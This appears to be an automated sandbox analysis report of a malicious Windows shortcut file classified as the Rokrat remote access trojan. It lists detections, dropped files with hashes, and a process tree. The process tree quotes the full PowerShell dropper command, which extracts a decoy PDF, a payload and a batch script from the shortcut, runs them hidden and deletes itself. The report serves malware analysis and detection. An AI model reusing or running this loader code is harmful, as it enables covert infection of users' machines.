Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    145s
  • max time network
    147s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    09/04/2024, 01:58

General

  • Target

    b1025baa59609708315326fe4279d8113f7af3f292470ef42c33fccbb8aa3e56.lnk

  • Size

    56.2MB

  • MD5

    358122718ba11b3e8bb56340dbe94f51

  • SHA1

    0c61effe0c06d57835ead4a574dde992515b9382

  • SHA256

    b1025baa59609708315326fe4279d8113f7af3f292470ef42c33fccbb8aa3e56

  • SHA512

    7c4beb041fde779e21b01f26c571026b1ba38a24002b89bc57ca6cf2bc0e6e0ff38f6a100a30e3622eff403ba7ebb572839b033f81b0663939666a443184eb01

  • SSDEEP

    98304:xe9nAp+et8sMdP7jKFYM0bI1/c/zNYP2wn:xIAp+etaZvdm/wG2wn

Score
10/10

Malware Config

Signatures

  • Detect Rokrat payload 2 IoCs
  • Rokrat

    Rokrat is a remote access trojan written in c++.

  • Blocklisted process makes network request 12 IoCs
  • Checks BIOS information in registry 2 TTPs 1 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Deletes itself 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • HTTP links in PDF interactive object 1 IoCs

    Detects HTTP links in interactive objects within PDF files.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 56 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\b1025baa59609708315326fe4279d8113f7af3f292470ef42c33fccbb8aa3e56.lnk
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2304
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\SysWOW64\cmd.exe" /k for /f "tokens=*" %a in ('dir C:\Windows\SysWow64\WindowsPowerShell\v1.0\*rshell.exe /s /b /od') do call %a "$dirPath = Get-Location; if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = 'C:\Users\Admin\AppData\Local\Temp'}; $lnkPath = Get-ChildItem -Path $dirPath -Recurse *.lnk | where-object {$_.length -eq 0x0382A8AD} | Select-Object -ExpandProperty FullName;$lnkFile=New-Object System.IO.FileStream($lnkPath, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read);$lnkFile.Seek(0x00001090, [System.IO.SeekOrigin]::Begin);$pdfFile=New-Object byte[] 0x004B4DD3;$lnkFile.Read($pdfFile, 0, 0x004B4DD3);$pdfPath = $lnkPath.replace('.lnk','.pdf');sc $pdfPath $pdfFile -Encoding Byte;& $pdfPath;$lnkFile.Seek(0x004B5E63,[System.IO.SeekOrigin]::Begin);$exeFile=New-Object byte[] 0x000D9402;$lnkFile.Read($exeFile, 0, 0x000D9402);$exePath=$env:public+'\'+'panic.dat';sc $exePath $exeFile -Encoding Byte;$lnkFile.Seek(0x0058F265,[System.IO.SeekOrigin]::Begin);$stringByte = New-Object byte[] 0x000005A9;$lnkFile.Read($stringByte, 0, 0x000005A9);$batStrPath = $env:temp+'\'+'para.dat';$string = [System.Text.Encoding]::UTF8.GetString($stringByte);$string | Out-File -FilePath $batStrPath -Encoding ascii;$lnkFile.Seek(0x0058F80E,[System.IO.SeekOrigin]::Begin);$batByte = New-Object byte[] 0x00000135;$lnkFile.Read($batByte, 0, 0x00000135);$executePath = $env:temp+'\'+'price.bat';Write-Host $executePath;Write-Host $batStrPath;$bastString = [System.Text.Encoding]::UTF8.GetString($batByte);$bastString | Out-File -FilePath $executePath -Encoding ascii;& $executePath;$lnkFile.Close();remove-item -path $lnkPath -force;"&& exit
      2⤵
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Suspicious use of WriteProcessMemory
      PID:2596
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c dir C:\Windows\SysWow64\WindowsPowerShell\v1.0\*rshell.exe /s /b /od
        3⤵
          PID:2672
        • C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe "$dirPath = Get-Location; if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = 'C:\Users\Admin\AppData\Local\Temp'}; $lnkPath = Get-ChildItem -Path $dirPath -Recurse *.lnk | where-object {$_.length -eq 0x0382A8AD} | Select-Object -ExpandProperty FullName;$lnkFile=New-Object System.IO.FileStream($lnkPath, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read);$lnkFile.Seek(0x00001090, [System.IO.SeekOrigin]::Begin);$pdfFile=New-Object byte[] 0x004B4DD3;$lnkFile.Read($pdfFile, 0, 0x004B4DD3);$pdfPath = $lnkPath.replace('.lnk','.pdf');sc $pdfPath $pdfFile -Encoding Byte;& $pdfPath;$lnkFile.Seek(0x004B5E63,[System.IO.SeekOrigin]::Begin);$exeFile=New-Object byte[] 0x000D9402;$lnkFile.Read($exeFile, 0, 0x000D9402);$exePath=$env:public+'\'+'panic.dat';sc $exePath $exeFile -Encoding Byte;$lnkFile.Seek(0x0058F265,[System.IO.SeekOrigin]::Begin);$stringByte = New-Object byte[] 0x000005A9;$lnkFile.Read($stringByte, 0, 0x000005A9);$batStrPath = $env:temp+'\'+'para.dat';$string = [System.Text.Encoding]::UTF8.GetString($stringByte);$string | Out-File -FilePath $batStrPath -Encoding ascii;$lnkFile.Seek(0x0058F80E,[System.IO.SeekOrigin]::Begin);$batByte = New-Object byte[] 0x00000135;$lnkFile.Read($batByte, 0, 0x00000135);$executePath = $env:temp+'\'+'price.bat';Write-Host $executePath;Write-Host $batStrPath;$bastString = [System.Text.Encoding]::UTF8.GetString($batByte);$bastString | Out-File -FilePath $executePath -Encoding ascii;& $executePath;$lnkFile.Close();remove-item -path $lnkPath -force;"
          3⤵
          • Deletes itself
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2588
          • C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
            "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\b1025baa59609708315326fe4279d8113f7af3f292470ef42c33fccbb8aa3e56.pdf"
            4⤵
            • Suspicious behavior: GetForegroundWindowSpam
            • Suspicious use of SetWindowsHookEx
            PID:2772
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c ""C:\Users\Admin\AppData\Local\Temp\price.bat""
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:3004
            • C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe
              C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden "$stringPath=$env:temp+'\'+'para.dat';$stringByte = Get-Content -path $stringPath -encoding byte;$string = [System.Text.Encoding]::UTF8.GetString($stringByte);$scriptBlock = [scriptblock]::Create($string);&$scriptBlock;"
              5⤵
              • Blocklisted process makes network request
              • Checks BIOS information in registry
              • Drops file in Windows directory
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:2116
              • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
                "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\toj86dxc.cmdline"
                6⤵
                • Suspicious use of WriteProcessMemory
                PID:1548
                • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
                  C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4A5A.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC4A59.tmp"
                  7⤵
                    PID:1492
                • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
                  "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\a4ltqty9.cmdline"
                  6⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2632
                  • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
                    C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4AC7.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC4AC6.tmp"
                    7⤵
                      PID:2644
                  • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
                    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\if4hnj9h.cmdline"
                    6⤵
                    • Suspicious use of WriteProcessMemory
                    PID:3040
                    • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
                      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4B34.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC4B33.tmp"
                      7⤵
                        PID:1332
                    • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
                      "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\mj_8b0av.cmdline"
                      6⤵
                      • Suspicious use of WriteProcessMemory
                      PID:1996
                      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
                        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4B92.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC4B91.tmp"
                        7⤵
                          PID:2000

            Network

            MITRE ATT&CK Enterprise v15

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Admin\AppData\Local\Temp\09892BC3.tmp

              Filesize

              46KB

              MD5

              6f2bdbab4bb290863201acc07629432e

              SHA1

              7becc58d13700dcfe60e098da23f8edcf422fe8a

              SHA256

              1af186d5a56e0e03457ec89ba8cc76cda02a92375a2bf80db9c5d2e058fcde67

              SHA512

              a528a7a0c21bc354b9ae2b06c8c9aeb694a2162020e9be820219decd404ed6448ab7a89ac125d99ac9ec124939e3e4a0f074938f43e5e4a65b447d899c1a82cd

            • C:\Users\Admin\AppData\Local\Temp\RES4A5A.tmp

              Filesize

              1KB

              MD5

              852de6880bcc099aa809f95f92b024ad

              SHA1

              bc6c8c2da66b74518609213be0752f23ec7975dc

              SHA256

              1cab9bf94c7f9c32e85455cd4a223c0e04c4d86188748a27720b56399ee24991

              SHA512

              c95fe8d4f8e23ba69411b1117fc27ac6ed2a57b0f7b321461b5e49c37aba31251ec7fc63bba4285846b9fe6cff2b05a269b03b2f8093e2ef514bfb01788aad53

            • C:\Users\Admin\AppData\Local\Temp\RES4AC7.tmp

              Filesize

              1KB

              MD5

              596fae69555d7b776703f577000d5475

              SHA1

              4feb8c072528a7fdb4cbd1d2f38cfe501c406b55

              SHA256

              b090c0d4c1bc5164fef854631d0a641ed8acd8c330b6d09a58c28266087de46a

              SHA512

              6f1a6ae2e66a3543ef2e5fcdcc2d2afa8be742cd66f3421f2ef3f6f50a07cb4f98cb2bc8f6380c7726cd8e66c4bf8237a431e2cdfa3c3eb67f18432e56a9727d

            • C:\Users\Admin\AppData\Local\Temp\RES4B34.tmp

              Filesize

              1KB

              MD5

              c0bdf4b0533d3bdef085b831dc4e4605

              SHA1

              0675ab35835752ce4a92ba2f73d7969057cb09dd

              SHA256

              722d59fc3830c690110c74fb056cba285f9232df6386e3579e5a25941182e328

              SHA512

              1d5dec40fc29dd658edddda6a9174f145d685e09ed4199ca672d7ae79e032bbe8c7f4c238bfe1239394a32c848ee055c989fe439cb6593e30d4fbfe0829f2407

            • C:\Users\Admin\AppData\Local\Temp\RES4B92.tmp

              Filesize

              1KB

              MD5

              88db76fe9be95e8dc7f2e90441250fcd

              SHA1

              0e3f2644d6234bbf71631aeddf89d62c270ead1b

              SHA256

              981cec2c2461c195854d3efd56c465b8348e5f3d4be8c2f018ae251539e8e1e3

              SHA512

              1f05a00bf609e4616d11f0159e05ae69ade0293cc3eef1af9603a9643b5750af1a9f16cf45cc8e9852ed63007bcc84cc2d2997a9b95cbb2061fcb4ca94e64b86

            • C:\Users\Admin\AppData\Local\Temp\a4ltqty9.dll

              Filesize

              3KB

              MD5

              8061a7ad093243f02f2793eef0b06cb4

              SHA1

              be93f3d4ca6318304f9b355b1c030b5780592d01

              SHA256

              217d2f3badc9e5b414fa9486eb3b67e06d1fbd837adeeb6d3a5196a559198351

              SHA512

              5fe6b6d542c684a103f450864b4f88d401c30ab94f0ed0071296fc696a83c2e242583e4a35a073fdfbf42f77b00d99f57bfd6eebfc9b26072db22e967ed24b10

            • C:\Users\Admin\AppData\Local\Temp\a4ltqty9.pdb

              Filesize

              7KB

              MD5

              203ead6cf2ec14a30ca1130d5b5eee58

              SHA1

              aebd072176c9e69b45e3585a3e03367065a5aa9d

              SHA256

              7b3aa869f6a7a6a544613cc21385f1bc7bd2978695ec8e47ae6c1f540f044471

              SHA512

              eaff3837533ee17273e99abff03df20d68b11b3ad9cd5040e9327df28632221ae3db4eb1cea4bfd0cc813aaf0c9d7719fcb3686cd45f3cb92b19b1d740619f8a

            • C:\Users\Admin\AppData\Local\Temp\b1025baa59609708315326fe4279d8113f7af3f292470ef42c33fccbb8aa3e56.pdf

              Filesize

              4.7MB

              MD5

              29ec187f2ed2eca0953dca0a68ac3722

              SHA1

              a20557b2e4a8b2c5e8a735c5d2f30aeaad01726e

              SHA256

              81269c3c41d957765314a1704e0ea6cdf9666eab729597207fd1cc844c749beb

              SHA512

              890a37f5e8fbe4d1cef6d52ec0c7b6dbf378f3545a59cdef1d796fee0aec8662564cdfd86f019f8e6bd60d8c678b72746200a1ce917a867bd21546ed06ac2bc8

            • C:\Users\Admin\AppData\Local\Temp\if4hnj9h.dll

              Filesize

              3KB

              MD5

              07fb8ed0873fddca40e69c1ef1d6f69d

              SHA1

              6e18311b8ffa74f47470c696b8918ce2efc8a773

              SHA256

              1c4577a53840fe5eb060f348723132eea61cf28bf960b27e06db8c11a127e881

              SHA512

              1d469c480e55878c4d2a9e5157d38684fef89d33b74c569bb2809ee98169a1f138671976d41f0c11eb721a6d2d983000add8e84cdc778b8bde7ce034a2809fe3

            • C:\Users\Admin\AppData\Local\Temp\if4hnj9h.pdb

              Filesize

              7KB

              MD5

              62839972e51338660caf7fdf32e1aa48

              SHA1

              cfce69ae6e02148a18525632c2ff8c2b7c3b3184

              SHA256

              c4a06d376e108eea01e474f2ed8dc4e2b944f7b53c1498fbe8040cf3d380d0f9

              SHA512

              4828f15752ec2ad58eacdd91c146c749db3422b08f042883ba17b167c17adb18ea211cf9b535db08f1cbecaa793344056e41197e886b2685aba4b72106840b38

            • C:\Users\Admin\AppData\Local\Temp\mj_8b0av.dll

              Filesize

              3KB

              MD5

              e1459df68b25654295e133f63614e99e

              SHA1

              69266a7b9d7484541937bd0f55b4b1ff93bef7e4

              SHA256

              480b361d5e478a16a55f1804cd9a733e1fd0f4779a355a74d7fce964835e07eb

              SHA512

              8fbaae9efbf769edcc54ea7b9cd1cd08e6d5645ca09e8bb4f5947f29fb06579b2db66c8aae4e99655153ea003672c41e217bc722271dc4314d6b9e436d135cd6

            • C:\Users\Admin\AppData\Local\Temp\mj_8b0av.pdb

              Filesize

              7KB

              MD5

              cafe77c6b9b5b037df48341f0c54ff0f

              SHA1

              e482ffa3161b8fdc6621eaa788c5c90c6a02c9a5

              SHA256

              110d4e8629bf9ad5bb0090f022af4acbb7e13392c1abe0f1e00cf3e1a528845a

              SHA512

              d8192d48b165a4db1121b06351b1b6c644855a1dd5aed771b1206e9df08455eed453386ec8db68ad90a3617e09d35e90848c48bd1705fe217bf3b236dbc17432

            • C:\Users\Admin\AppData\Local\Temp\para.dat

              Filesize

              1KB

              MD5

              655f58dcd7cd8bd996076ad4b492ae00

              SHA1

              7d69d7926de1ad560f0d002bd768eb182177cca4

              SHA256

              4e9d83e270910fa2610a2bdb0fef2bc2f5a2c257ce8c9eb5ba3f73eb051f5cf7

              SHA512

              87575186d8674c4be4f736db9b008b5ef975a21b60d38a635ad874dd399b5263fc6cba94e6010681c6262241df3b1f3074411c815121141414727c326d70e204

            • C:\Users\Admin\AppData\Local\Temp\price.bat

              Filesize

              311B

              MD5

              f5787b3e60fad2b255ebc54d0ce747dc

              SHA1

              830705c5417f11c730cd8bbde4a2a709671cc11d

              SHA256

              a43f7b080c30816997fc15589f904365917f30ae15441b22fbda11aec2ddf1c0

              SHA512

              1e702414e37c90da42457295653e4df5a64208476206e001d8c23edfe5b8e7e5145672b5e0abf5bc4667e4e059735066db4c0a6a04cca259eb96e7755ce6cd8f

            • C:\Users\Admin\AppData\Local\Temp\toj86dxc.dll

              Filesize

              3KB

              MD5

              605060d91763abfa9cf06212c0e09574

              SHA1

              80c9d686fac5d8ded0a8571da26941a39b13094d

              SHA256

              e1a2e8ec910191445fb29fe1ab3180a12608d3b20f7c5d63e48e4f01ec56a498

              SHA512

              ba14b6bad6b37d958091c2df59233a8c51a495da7fd6800d4f2136257243210f679f08e74dab9758820ad23dcc19da2fb4e8b16a8b9a2f60798ffcb24b78f120

            • C:\Users\Admin\AppData\Local\Temp\toj86dxc.pdb

              Filesize

              7KB

              MD5

              5f9934a1629a85756d84c80048c34cda

              SHA1

              7fbd0934d78cc15819f2c13671fadd10aad41475

              SHA256

              8c114ff85534ad06b059c991f4d803ea9c324b988734a40687936409ed42f954

              SHA512

              10705225573bbb6236e8b5485ae363c86b9ba75f2f5407b0dc994ec2f508e07feaf45ed6bdc1fcf42b66bb3863c91b95316bd6b825a65d92557e7a7581cbd65f

            • C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents

              Filesize

              3KB

              MD5

              e6c34afa18e3e407696350a85b983fbc

              SHA1

              8d6f0041280b37f1e4ed850018668712426808f4

              SHA256

              7aea74754979e3444a30f596c77fddddd28dabae344555d3e69d88ff27f616a9

              SHA512

              d69262d0f9a42abf242f1b22ab89cfa1a60e65bd046dc8343a3b1024402fb06f1b77a0780f5123e06aaa0f1cca63a3e1093cbe2c21319f28537b39abfbc17be4

            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

              Filesize

              7KB

              MD5

              9c4c46b68ca05e4bb04b2c83987163b3

              SHA1

              74cd4c99d2c2c39e2b6091be4f533300196e1d98

              SHA256

              02b0ce632119daca631528aeb8e34594e21f0f0f8bbd136fa676293993ed372c

              SHA512

              b995511bf3e19270cd87b781bdc7e7de5647a6ae30375e27b8d4f8a17a43f4ce67572639e75afcfc14dae8feebd958a2b0b65a8cbd756224fb3120db7a6fa2fa

            • C:\Users\Public\panic.dat

              Filesize

              869KB

              MD5

              a043b3a2af9db6173e3a39b5c501a9bd

              SHA1

              4250f3855e53ccf755f8a05b1998f55dfa4b2c0e

              SHA256

              dc6ca2e9ce800245a65715647bb1614c35632f270d1879e796472e786cdfc0fc

              SHA512

              a667c8521589e96ba57b2ae6e429f43a352c36968edb4cadf57500a1a5e39511b3e7109bb2c372b9567c8e50777cfc71f0cb8150f2782a6a8ac9d90222f802f5

            • \??\c:\Users\Admin\AppData\Local\Temp\CSC4A59.tmp

              Filesize

              652B

              MD5

              4b2a89b88d99c8217b1927da93f9bde7

              SHA1

              6631cfed07a03f3f8c75c28f1121980055f3766b

              SHA256

              35ba98964b48f623767d7d591ffbe63261cbe6f8edd939a5b8aac92443706e60

              SHA512

              f065433d636b367f393dbaaaf05e910651c309de4d6c59c37426099c7e48cf2651dfaaf30a92135a4331a5ad800d13319911ba5c45ae35c27c5c322959beed1c

            • \??\c:\Users\Admin\AppData\Local\Temp\CSC4AC6.tmp

              Filesize

              652B

              MD5

              0b916d3726e469c7d7fd8e1ac0259d83

              SHA1

              5a5f96ffa17019706c48a3d22ff7bb1772c490a5

              SHA256

              43c36ca58072bd9aa88fc7f530dc081317c93086f6e42a8672207bef0c5f7576

              SHA512

              76748925e65c9d9a9aa946030ce291d10059bb58dcb9ebda31d0c25b4597abdc131e7ba6c6e887da7003c3288a7dea33184621587b298f7a7d491ebdfd381867

            • \??\c:\Users\Admin\AppData\Local\Temp\CSC4B33.tmp

              Filesize

              652B

              MD5

              5ee97c673f409ca92266510b36736ed3

              SHA1

              c7b2148a331da6a92e691e42544f50c895fa2ca3

              SHA256

              7730308cf5a2854f49ca9a67ecd5e04884311dbb7d6ebc9a32c23543e0bf5b02

              SHA512

              5241c2653acfaa0761a1ca814b802052addd32f49ac7c220f3d3df63de7c0529cb523a5020a1c997ae1f686260beff16dba189570342bfcb4af1a3997662b45b

            • \??\c:\Users\Admin\AppData\Local\Temp\CSC4B91.tmp

              Filesize

              652B

              MD5

              f586e230755b8856b6c4d3b42d5396ff

              SHA1

              ac6bbec12d9aff4943288d18977420ac6dc5733e

              SHA256

              0a6f46c66b807ac38857c3d13d4858bc0a31feea200dd94f13f9c71b3487e4d6

              SHA512

              7b1b455f57146dd503aaa80c7859887849d05a4cf23861f1ef7ca0d1b31b13317c080b6c45183599c75b3919b9e4b2a0d2910e3e96d5b899f59f4821f31d80c7

            • \??\c:\Users\Admin\AppData\Local\Temp\a4ltqty9.0.cs

              Filesize

              272B

              MD5

              4de985ae7f625fc7a2ff3ace5a46e3c6

              SHA1

              935986466ba0b620860f36bf08f08721827771cb

              SHA256

              53d5aecb149a00bc9c4fac5feb8e5feddf5c83986c12d5fef1c3ddd104b09004

              SHA512

              067916a8d16d322d72901baf3a369be43c99780961ccd306c171bf7ded06e3a13cf69c7fa0cd26c7fa181d87fc0e870f86d274098854a56346ca9272c0b99393

            • \??\c:\Users\Admin\AppData\Local\Temp\a4ltqty9.cmdline

              Filesize

              309B

              MD5

              a779703be3e6a28b2d15ab01d3c53852

              SHA1

              45686dc8b014191061045f7bdab110ba16dbb462

              SHA256

              6fcee950a035429d68e2cb9cdaee7cb0c1d1e4d6df34980e72b9dec57bdb9c24

              SHA512

              7d9071ff036d55d4857c8b926ec14207181bb73e1865891a97e54381dfd196a6ef5411185ac93f5abfc9e113846a9d38768259c8c0e2c419a4196a3201020a6b

            • \??\c:\Users\Admin\AppData\Local\Temp\if4hnj9h.0.cs

              Filesize

              286B

              MD5

              b23df8158ffd79f95b9bddd18738270b

              SHA1

              79e81bb74bc53671aeabecae224f0f9fe0e3ed7f

              SHA256

              856bded4416dd1595613354334ad1d3e5c4922a86102786429bcdb0e7f798882

              SHA512

              e23822d5b9a32d7fc705b772ef43bcb336e201ec9c1d2507a530e8b1b383b0727c0b53b92e881a953527e7b2ffb485e24c1161834c9380d1bb7498eac7e4a67f

            • \??\c:\Users\Admin\AppData\Local\Temp\if4hnj9h.cmdline

              Filesize

              309B

              MD5

              c656b3331170b42f0605e98324eb53c5

              SHA1

              7184b244f4d680fb75859b72dbcdffb0b697ff3e

              SHA256

              5206eed768bad0b996ab3d32c52f7b44192d813723bed7d8f3fe564bbbceb2af

              SHA512

              7d7448657feb648cdf48fec7c70a6c9fd12f38a822f071af32ae4c8b10be5e957a2df3c3a6be3636b175e7f627708ae308d3e6c3a8ac9bb24d18d715de451060

            • \??\c:\Users\Admin\AppData\Local\Temp\mj_8b0av.0.cs

              Filesize

              259B

              MD5

              560e1b883a997afcfa3b73d8a5cddbc1

              SHA1

              2905f3f296ac3c7d6a020fb61f0819dbea2f1569

              SHA256

              e5231270257f1727ca127b669a7c21d46ced81cd5b46e89c48dd8304c1185bea

              SHA512

              041dd231b93708d4ad65580ea0fa7cff34a9a43ff8d3ae45b631a381e01dc286607aec05b1aade537818d068ca0b576cac613fde626d60eb2e4e6c3c0f525635

            • \??\c:\Users\Admin\AppData\Local\Temp\mj_8b0av.cmdline

              Filesize

              309B

              MD5

              e8134a8424471a04a1b8904118689b83

              SHA1

              bdda98b8ba6d6342062f20cf5f7f19df7c5a7f85

              SHA256

              9dcc8fa5df8aeb9377879a22569600ca38ecdc25aaef14906253a91799a5a859

              SHA512

              febd63fb86237f0667f86ede6f330706e70020ba1ee695b838d894986f91a4e33c5620aed72d5302c8b3fdadc01630bc9ac8c81af2abe588589222cc8f8710c1

            • \??\c:\Users\Admin\AppData\Local\Temp\toj86dxc.0.cs

              Filesize

              249B

              MD5

              69ecfeb3e9a8fb7890d114ec056ffd6d

              SHA1

              cba5334d2ffe24c60ef793a3f6a7f08067a913db

              SHA256

              0a913fd594ad2da3159400fc3d7d2cc50b34f8f31675ec5ac5a41d7e79e9fd58

              SHA512

              be7eb5a6a8bcc7f279aee00ad650aa872fc7fc08227eedeb9cc0a4273f0382b91306f60878728eaba3c79fa8c96066b144ecea897360a11be38996f04fdd99e1

            • \??\c:\Users\Admin\AppData\Local\Temp\toj86dxc.cmdline

              Filesize

              309B

              MD5

              4aa614e20e8fc26f2338f75f3fda2d6a

              SHA1

              a2ce5cbae8947a82c7c9da3ecc85136e79fa0d27

              SHA256

              80393b7c4e2e75d26ecea31f46af1ddfa66228550cdf3291d5d1f1ca16f0720c

              SHA512

              222b0e04d0b4c8cf7bf87f053f3630d780fb2623e4418bb209bcd1b82dc1286d226eb2290dbbb16b3419ae46f2e8ea8942f60b3c1335d1ec86fbba35da3d9d60

            • memory/1548-88-0x0000000001FC0000-0x0000000002000000-memory.dmp

              Filesize

              256KB

            • memory/2116-145-0x00000000057E0000-0x00000000058BA000-memory.dmp

              Filesize

              872KB

            • memory/2116-151-0x00000000738C0000-0x0000000073E6B000-memory.dmp

              Filesize

              5.7MB

            • memory/2116-61-0x00000000738C0000-0x0000000073E6B000-memory.dmp

              Filesize

              5.7MB

            • memory/2116-64-0x00000000027E0000-0x0000000002820000-memory.dmp

              Filesize

              256KB

            • memory/2116-153-0x00000000027E0000-0x0000000002820000-memory.dmp

              Filesize

              256KB

            • memory/2116-62-0x00000000027E0000-0x0000000002820000-memory.dmp

              Filesize

              256KB

            • memory/2116-152-0x00000000027E0000-0x0000000002820000-memory.dmp

              Filesize

              256KB

            • memory/2116-63-0x00000000738C0000-0x0000000073E6B000-memory.dmp

              Filesize

              5.7MB

            • memory/2116-148-0x000000000C5D0000-0x000000000C6B3000-memory.dmp

              Filesize

              908KB

            • memory/2116-147-0x000000000C5D0000-0x000000000C6B3000-memory.dmp

              Filesize

              908KB

            • memory/2116-146-0x00000000057E0000-0x00000000058BA000-memory.dmp

              Filesize

              872KB

            • memory/2588-38-0x00000000738C0000-0x0000000073E6B000-memory.dmp

              Filesize

              5.7MB

            • memory/2588-41-0x00000000738C0000-0x0000000073E6B000-memory.dmp

              Filesize

              5.7MB

            • memory/2588-54-0x00000000738C0000-0x0000000073E6B000-memory.dmp

              Filesize

              5.7MB

            • memory/2588-40-0x00000000027D0000-0x0000000002810000-memory.dmp

              Filesize

              256KB

            • memory/2588-39-0x00000000027D0000-0x0000000002810000-memory.dmp

              Filesize

              256KB

            • memory/2632-104-0x00000000003A0000-0x00000000003E0000-memory.dmp

              Filesize

              256KB